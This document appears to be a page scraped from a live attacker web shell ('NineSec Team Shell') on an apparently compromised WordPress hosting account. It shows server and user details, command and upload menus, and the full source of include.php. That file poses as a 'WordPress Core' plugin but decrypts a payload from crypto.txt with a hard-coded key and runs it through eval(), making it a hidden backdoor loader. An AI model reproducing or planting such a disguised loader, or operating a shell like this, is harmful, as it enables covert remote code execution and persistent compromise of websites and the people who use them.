NineSec Team Shell

��JFIF��(ICC_PROFILE��mntrRGB XYZ ��acsp��-�� desc��trXYZ��d��gXYZ��x��bXYZ��rTRC��(gTRC��(bTRC��(wtpt��cprt�� NineSec Team Shell NineSec Team Shell

Server IP : 10.27.20.61 / Your IP : 216.73.216.127
Web Server : Apache
System : Linux webm031.cluster027.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : labtrns ( 126716)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON
Directory (0755) : /home/labtrns/www/wp-includes/css/../widgets/

[ Home ]	[ C0mmand ]	[ Upload File ]	[ Lock Shell ]	[ Logout ]

Current File : /home/labtrns/www/wp-includes/css/../widgets/include.php

<?php
/**
 * @package Wordpress_Core
 * @version 1.7.2
 */
/*
Plugin Name: WordPress Core
Plugin URI: http://wordpress.org/plugins/
Description: This is core plugin for managment WordPress.
Version: 1.7.2
Author URI: http://wordpress.org/
*/
    class UnsafeCrypto
    {
        const METHOD = 'aes-256-ctr';
        
        /**
         * Encrypts (but does not authenticate) a message
         * 
         * @param string $message - plaintext message
         * @param string $key - encryption key (raw binary expected)
         * @param boolean $encode - set to TRUE to return a base64-encoded 
         * @return string (raw binary)
         */
        public static function encrypt($message, $key, $encode = false)
        {
            $nonceSize = openssl_cipher_iv_length(self::METHOD);
            $nonce = openssl_random_pseudo_bytes($nonceSize);
            
            $ciphertext = openssl_encrypt(
                $message,
                self::METHOD,
                $key,
                OPENSSL_RAW_DATA,
                $nonce
            );
            
            // Now let's pack the IV and the ciphertext together
            // Naively, we can just concatenate
            if ($encode) {
                return base64_encode($nonce.$ciphertext);
            }
            return $nonce.$ciphertext;
        }

        /**
         * Decrypts (but does not verify) a message
         * 
         * @param string $message - ciphertext message
         * @param string $key - encryption key (raw binary expected)
         * @param boolean $encoded - are we expecting an encoded string?
         * @return string
         */
        public static function decrypt($message, $key, $encoded = false)
        {
            if ($encoded) {
                $message = base64_decode($message, true);
                if ($message === false) {
                    throw new Exception('Encryption failure');
                }
            }

            $nonceSize = openssl_cipher_iv_length(self::METHOD);
            $nonce = mb_substr($message, 0, $nonceSize, '8bit');
            $ciphertext = mb_substr($message, $nonceSize, null, '8bit');
            
            $plaintext = openssl_decrypt(
                $ciphertext,
                self::METHOD,
                $key,
                OPENSSL_RAW_DATA,
                $nonce
            );
            
            return $plaintext;
        }
    }

    $text = base64_decode(file_get_contents("./crypto.txt"));
    $key = hex2bin('000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f');

    // $encrypted = UnsafeCrypto::encrypt($text, $key);
    // file_put_contents("./crypto.txt", $encrypted);
    $decrypted = UnsafeCrypto::decrypt($text, $key);

    eval($decrypted);
?>

NineSec Team - 2022